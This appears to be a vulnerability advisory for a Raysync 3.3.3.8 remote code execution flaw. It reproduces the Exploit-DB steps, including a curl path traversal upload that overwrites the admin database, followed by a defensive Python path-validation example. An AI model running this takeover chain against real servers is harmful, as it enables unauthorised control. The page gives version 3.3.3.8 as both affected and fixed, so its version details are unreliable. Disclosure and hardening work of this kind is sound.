Vendor: Raysync
By: XiaoLong Zhu
CVSS: 9.8 (HIGH)
Vulnerability Type: Remote Code Execution
CWE: 78
Product Name: Raysync
Affected Version From: Below 3.3.3.8
Affected Version To: 3.3.3.8
Patch Exists: YES
Related CWE: N/A
CPE: a:raysync:raysync
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2020

Raysync 3.3.3.8 – RCE

Raysync 3.3.3.8 is vulnerable to Remote Code Execution. The attack chain begins with the attacker running RaysyncServer.sh in a local environment to build the web application and setting the admin password to 123456, which is written to the manage.db file. The attacker then uses curl to override the remote manage.db file on the server through the avatar upload endpoint, whose UserId parameter accepts a path traversal sequence. After logging in to the admin portal with admin/123456, the attacker creates a normal file with all permissions in scope, modifies RaySyncServer.sh to add an arbitrary command, and triggers its execution by clicking the 'reset' button.

Mitigation:

Users should update to the latest version, Raysync 3.3.3.8, to patch this vulnerability.

Exploit-DB raw data:

# Exploit Title: Raysync 3.3.3.8 - RCE
# Date: 04/10/2020
# Exploit Author: XiaoLong Zhu
# Vendor Homepage: www.raysync.io
# Version: below 3.3.3.8
# Tested on: Linux

step1: run RaysyncServer.sh to build a web application in the local environment, set the admin password to 123456, which will be written to the manage.db file.

step2: curl "file=@manage.db" http://[raysync ip]/avatar?account=1&UserId=/../../../../config/manager.db

to override the remote manage.db file on the server.

step3: log in to the admin portal with admin/123456.

step4: create a normal file with all permissions in scope.

step5: modify RaySyncServer.sh, add arbitrary evil command.

step6: trigger RCE by clicking the "reset" button.
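
Step 2 implies that the avatar upload handler builds the destination path from the UserId request parameter. The following is an added example, not Raysync's code and not part of the original advisory, showing that path-handling flaw beside a hardened resolver. The directory layout, function names and the UserId allowlist are assumptions made for illustration.

```python
import os
import re
import tempfile

# Assumption: user IDs are short alphanumeric tokens; adjust to the real format.
_USER_ID_RE = re.compile(r"[A-Za-z0-9_-]{1,64}")

class UnsafeUserId(ValueError):
    """Raised when a UserId would place the upload outside the avatar root."""

def naive_avatar_path(avatar_root: str, user_id: str) -> str:
    # Vulnerable pattern: the request parameter is concatenated into the path.
    return os.path.normpath(avatar_root + "/" + user_id)

def safe_avatar_path(avatar_root: str, user_id: str) -> str:
    # 1) Allowlist the identifier: no separators, dots or empty values.
    if not _USER_ID_RE.fullmatch(user_id):
        raise UnsafeUserId(f"rejected UserId: {user_id!r}")
    # 2) Defence in depth: resolve symlinks and confirm containment.
    root = os.path.realpath(avatar_root)
    candidate = os.path.realpath(os.path.join(root, user_id))
    if os.path.commonpath([root, candidate]) != root:
        raise UnsafeUserId(f"path escapes avatar root: {candidate}")
    return candidate

def demo():
    """Return (naive_escapes, safe_rejects, safe_accepts_normal_id)."""
    with tempfile.TemporaryDirectory() as tmp:
        install = os.path.realpath(tmp)  # hypothetical install directory
        avatar_root = os.path.join(install, "data", "web", "img", "avatar")
        os.makedirs(avatar_root)
        config_db = os.path.join(install, "config", "manager.db")
        page_value = "/../../../../config/manager.db"  # UserId from step 2
        naive_escapes = naive_avatar_path(avatar_root, page_value) == config_db
        try:
            safe_avatar_path(avatar_root, page_value)
            safe_rejects = False
        except UnsafeUserId:
            safe_rejects = True
        normal = safe_avatar_path(avatar_root, "1")
        return naive_escapes, safe_rejects, normal == os.path.join(avatar_root, "1")

if __name__ == "__main__":
    print(demo())
```

The containment check after `realpath` also rejects an allowlisted name that is a symlink pointing outside the avatar directory, which the pattern match alone would accept.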